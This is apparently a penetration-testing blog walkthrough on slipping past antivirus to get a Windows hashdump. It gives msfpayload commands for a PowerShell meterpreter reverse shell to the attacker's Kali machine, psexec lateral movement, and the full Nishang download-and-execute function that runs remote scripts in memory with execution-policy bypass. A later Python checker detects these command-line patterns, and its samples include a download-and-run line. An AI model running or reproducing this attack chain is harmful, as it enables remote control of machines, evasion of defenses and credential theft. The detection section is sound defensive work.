avoiding AV detection
I'd like to try a more sophisticated way of gathering the hashdump.
With many thanks to:
http://0entropy.blogspot.co.uk/2012/04/powershell-metasploit-meterpreter-and.html
https://www.fishnetsecurity.com/6labs/blog/bypassing-antivirus-powershell
We need 3 machines for this:
- metasploit (Kali)
- Windows with powershell
- The final target (Windows Server)
On Kali:
Create a PowerShell meterpreter
msfpayload windows/meterpreter/reverse_tcp LHOST=[IP of Kali] LPORT=443 R | msfencode -t psh -a x86
On the PowerShell machine:
Convert the PS meterpreter shell to the right format (base64 of the UTF-16LE text, which is what powershell.exe -EncodedCommand expects):
c:\> powershell
PS c:\> $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
PS c:\> $e = [Convert]::ToBase64String($u)
PS c:\> $e
Put this output as a file into a web server directory on Kali and make sure you can access/download it.
Now get to the target:
c:\> psexec \\[Target] -u domain\jdoe cmd.exe
Create the PS script below, which downloads your script from Kali and executes it in memory. (Thanks to Nishang)
function Download-Execute-PS
{
<#
.SYNOPSIS
Nishang payload which downloads and executes a PowerShell script.

.DESCRIPTION
This payload downloads a PowerShell script from the specified URL and then executes it on the target.
Use the -nodownload option to avoid saving the script on the target. Otherwise, the script is saved with a random filename.

.PARAMETER ScriptURL
The URL from where the PowerShell script will be downloaded.

.PARAMETER Arguments
The arguments to pass to the script when it is not downloaded to disk, i.e. with the -nodownload switch. This is to be used when the script loads a function in memory, true for most scripts in Nishang.

.PARAMETER Nodownload
If this switch is used, the script is not downloaded to the disk.

.EXAMPLE
PS > Download-Execute-PS http://pastebin.com/raw.php?i=jqP2vJ3x

.EXAMPLE
PS > Download-Execute-PS http://script.alteredsecurity.com/evilscript.ps1 -Argument evilscript -nodownload
The above command does not download the script file to disk and executes the evilscript function inside evilscript.ps1

.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
    [CmdletBinding()] Param(
        [Parameter(Position = 0, Mandatory = $True)]
        [String]
        $ScriptURL,

        [Parameter(Position = 1, Mandatory = $False)]
        [String]
        $Arguments,

        [Switch]
        $nodownload
    )

    if ($nodownload -eq $true)
    {
        # Fetch the script text and run it in memory without writing it to disk
        Invoke-Expression ((New-Object Net.WebClient).DownloadString("$ScriptURL"))
        if ($Arguments)
        {
            Invoke-Expression $Arguments
        }
    }
    else
    {
        # Save the script to %TEMP% under a random name and run it in a child powershell.exe
        $rand = Get-Random
        $webclient = New-Object System.Net.WebClient
        $file1 = "$env:temp\$rand.ps1"
        $webclient.DownloadFile($ScriptURL, "$file1")
        $script:pastevalue = powershell.exe -ExecutionPolicy Bypass -noLogo -command $file1
        Invoke-Expression $pastevalue
    }
}
Call this script to download and run your reverse shell:
Download-Execute-PS http://[Kali]/ps.txt
Go to your Kali and enjoy the reverse shell....
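The flip side for whoever is watching the target: the technique above leaves a recognisable shape in process command-line logs (4688 / Sysmon event 1), namely Net.WebClient + DownloadString/DownloadFile + Invoke-Expression, often hidden behind -EncodedCommand. The following Python checker is an added example, not part of the original post or of Nishang; the command lines it scans are constructed samples and the 192.0.2.10 address is a placeholder.

```python
import base64
import re

# Indicators taken from the technique above, matched on lowercased text.
# -EncodedCommand payloads are base64 of UTF-16LE text, so they are decoded first.
INDICATORS = [
    ("net.webclient", re.compile(r"net\.webclient")),
    ("downloadstring", re.compile(r"downloadstring")),
    ("downloadfile", re.compile(r"downloadfile")),
    ("invoke-expression", re.compile(r"invoke-expression|\biex\b")),
    ("frombase64string", re.compile(r"frombase64string")),
    ("executionpolicy bypass", re.compile(r"-(?:executionpolicy|ep)\s+bypass")),
]
# -e, -ec, -enc or -encodedcommand followed by a base64 blob
ENCODED_FLAG = re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or not valid base64/UTF-16LE."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def analyse(cmdline):
    """Return the indicator names present in a process command line, scanning
    both the visible arguments and the decoded -EncodedCommand payload."""
    visible = ENCODED_FLAG.sub(" ", cmdline)  # drop the blob so base64 noise cannot match
    text = visible.lower()
    decoded = decode_encoded_command(cmdline)
    if decoded:
        text += " " + decoded.lower()
    return [name for name, pat in INDICATORS if pat.search(text)]


def sample_command_lines():
    """Constructed samples of what a 4688 / Sysmon EID 1 CommandLine field might hold."""
    script = "IEX ((New-Object Net.WebClient).DownloadString('http://192.0.2.10/ps.txt'))"
    blob = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return [
        "powershell.exe -NoLogo -EncodedCommand " + blob,
        "powershell.exe -ExecutionPolicy Bypass -noLogo -command C:\\Temp\\1234.ps1",
        "powershell.exe Get-ChildItem C:\\",
    ]


if __name__ == "__main__":
    for line in sample_command_lines():
        print(analyse(line) or "clean", "<-", line[:70])
```

The second sample is exactly what the on-disk branch of Download-Execute-PS spawns, so a rule on "-ExecutionPolicy Bypass" plus a .ps1 in %TEMP% catches it even without the encoded-command decode.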